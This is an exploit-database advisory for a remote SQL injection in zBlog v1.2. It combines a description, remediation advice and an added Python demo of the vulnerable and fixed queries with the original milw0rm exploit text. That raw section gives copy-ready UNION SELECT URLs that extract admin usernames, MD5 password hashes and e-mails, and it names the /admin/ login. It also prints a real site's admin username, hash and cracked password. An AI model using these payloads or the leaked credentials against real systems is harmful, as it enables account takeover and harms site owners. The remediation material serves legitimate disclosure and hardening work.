Vendor: zBlog
By: H-T Team (HouSSamix, ToXiC350, CoNaN)
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote SQL Injection
CWE: 89
Product Name: zBlog
Affected Version From: zBlog v1.2
Affected Version To: zBlog v1.2
Patch Exists: NO
Related CWE:
CPE: a:zblog:zblog:1.2
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Year: 2007

zBlog v1.2 Remote SQL Injection Exploit

This exploit performs an unauthenticated remote SQL injection against zBlog v1.2. The 'page' parameter of index.php only selects the view (page=categ or page=articles); the injectable inputs are the 'categ' and 'article' parameters, whose values are used in SQL queries without sanitisation. A UNION SELECT padded to match the column count of the original query (17 columns for 'categ', 18 for 'article') returns the administrator username, password hash and e-mail address from the [table prefix]_admins table, where the prefix is zblog by default. The recovered password is an unsalted MD5 hash, and the admin login is at /admin/.

Mitigation:

The vendor has not provided a patch, and no fixed version is identified here. Until the script is corrected, the standard remediation for this class of bug applies: cast 'categ' and 'article' to integers before they reach the query, or bind them as parameters instead of concatenating them into the SQL string. Changing the administrator password and restricting access to /admin/ limits the impact of hashes that may already have been leaked.
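The following is an added example, not code from the advisory or from zBlog itself. It reproduces the vulnerable pattern and its hardened form against a constructed in-memory SQLite database: the admin column names (pseudo_admin, motdepasse_admin, email_admin) are taken from the advisory, while the category table, its three columns, the function names and all sample rows are assumptions. The category query here returns only three columns, so the UNION needs three; the advisory's payloads pad with 1,3,4,... because the real queries return 17 and 18 columns, and `find_column_count` shows how an attacker recovers that number.

```python
import hashlib
import sqlite3

# Constructed stand-in for the zBlog database. Only the admin column names
# (pseudo_admin, motdepasse_admin, email_admin) come from the advisory; the
# category table, its columns and all rows are assumptions for this example.
SCHEMA = """
CREATE TABLE zblog_admins (
    id_admin INTEGER PRIMARY KEY,
    pseudo_admin TEXT,
    motdepasse_admin TEXT,
    email_admin TEXT
);
CREATE TABLE zblog_categ (
    id_categ INTEGER PRIMARY KEY,
    nom_categ TEXT,
    description_categ TEXT
);
"""

ADMIN_USER = "alice"              # constructed sample account
ADMIN_PASS = "s3cret"             # stored as an unsalted MD5, as the advisory shows
ADMIN_EMAIL = "alice@example.invalid"


def open_db():
    """Return an in-memory SQLite database seeded with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute(
        "INSERT INTO zblog_admins VALUES (1, ?, ?, ?)",
        (ADMIN_USER, hashlib.md5(ADMIN_PASS.encode()).hexdigest(), ADMIN_EMAIL),
    )
    conn.executemany(
        "INSERT INTO zblog_categ VALUES (?, ?, ?)",
        [(1, "news", "Site news"), (2, "howto", "Tutorials")],
    )
    return conn


def vulnerable_categ_query(conn, categ):
    """The pattern the advisory exploits: the request parameter is spliced
    straight into the SQL text, so 'categ' can append a UNION of its own."""
    sql = (
        "SELECT id_categ, nom_categ, description_categ "
        f"FROM zblog_categ WHERE id_categ = {categ}"
    )
    return conn.execute(sql).fetchall()


def hardened_categ_query(conn, categ):
    """Fixed form: reject anything that is not an integer, then bind the value
    as a parameter so the driver never interprets it as SQL."""
    try:
        categ_id = int(categ)
    except (TypeError, ValueError):
        raise ValueError("categ must be an integer id")
    sql = ("SELECT id_categ, nom_categ, description_categ "
           "FROM zblog_categ WHERE id_categ = ?")
    return conn.execute(sql, (categ_id,)).fetchall()


def find_column_count(conn, query_fn, max_cols=32):
    """Recover how many columns the injectable SELECT returns by appending
    'UNION SELECT NULL,...' with a growing number of NULLs until the database
    stops rejecting the mismatched column count. A UNION must match the
    left-hand SELECT exactly, which is why the advisory pads its payloads
    with numeric placeholders."""
    for n in range(1, max_cols + 1):
        probe = "-1 UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            query_fn(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# The advisory's attack, reduced to this example's 3-column query.
PAYLOAD = (
    "-1 union select pseudo_admin,motdepasse_admin,email_admin "
    "from zblog_admins--"
)


def demo():
    """Run the attack against both query forms and report what happened."""
    conn = open_db()
    leaked = vulnerable_categ_query(conn, PAYLOAD)   # admin row comes back
    cols = find_column_count(conn, vulnerable_categ_query)
    try:
        hardened_categ_query(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked": leaked, "columns": cols, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The integer cast is what closes this particular hole, since a UNION cannot survive `int()`; the bound parameter is there so the fix does not depend on remembering the cast at every call site.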

Exploit-DB raw data:

#########################################################################
            zBlog v1.2  Remote SQL Injection Exploit
#########################################################################


## AUTHOR   : H-T Team ( HouSSamix _ ToXiC350 _ CoNaN )
## HOME     : http://no-hack.net

## Script   : zBlog
## Version  : 1.2
## Site     : http://kaxz01.free.fr/
## Download : http://kaxz01.free.fr/fichiers/zBlog.zip

## EXPLOITS :

[1]
http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--
[2]
http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--

[table prefix] = by default it is zblog

ex : http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins--

## Note
admin login is at /admin/

## GREETZ  :  RoMaNcYxHaCkEr , Mahmood_Ali , C_m  and all Muslim hackers

#########################################################################
            zBlog v1.2 Remote SQL Injection Exploit
#########################################################################

example of a vulnerable site

http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--


admin account, with the MD5 password cracked

user >> Selim
pass >> 6a81060b83b919bc115112bf840eca63 = miles

# milw0rm.com [2007-12-22]